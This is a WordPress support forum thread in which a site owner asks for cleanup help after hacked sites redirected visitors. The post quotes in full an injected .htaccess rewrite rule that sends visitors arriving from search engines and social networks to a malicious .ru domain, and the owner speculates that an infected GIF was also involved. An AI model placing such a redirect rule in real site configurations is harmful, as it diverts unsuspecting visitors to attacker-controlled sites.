vbzbb-naagz attack sites hacked

  • One of my hosting account was hacked and infected with vbzbb-naagz malicious code. It infected all my WP sites hosted under that account. I guess one wordpress site I had was running 1 year old version of WP. Ofcource now I will install a fresh and new version of WP on all infected sites. The htaccess files had this code injected.
    <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ https://vbzbb-naagz.ru/gzuzu?11 [R=301,L] </IfModule>

    Can someone help in finding a cleanup solution for this.

Viewing 5 replies - 1 through 5 (of 5 total)

  • It’s definitely not WordPress being hack, but your host being compromised. Ask your host to help out, but changing your passwords (cpanel, ftp, email, wp-admin etc) will be good.

    Thread Starter Manish

    (@nims)

    Its not the host.

    A strange thing happened. I deleted all the files and installed a fresh WP. The site worked fine but as soon as I uploaded my child theme it again got redirected to unwanted site. I checked all the files and there was no suspicious code.

    One of my friend helped me and asked me to comment out the logo.gif in header. I did and the site was fine. Conclusion the gif image was infected with some redirection code. Thats something worrying. I have more than 100 images on this site, how do I scan which image is corrupted and how do I remove the injected code from the image ?

    It’s in your htaccess file – scroll far to the right to see the 301 redirects that send them to that site

    Please post your URL name.

    Thread Starter Manish

    (@nims)

    Made the hosting company delete everything and install a fresh copy. Also it seemed there was some redirection code injected in the gif image.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘vbzbb-naagz attack sites hacked’ is closed to new replies.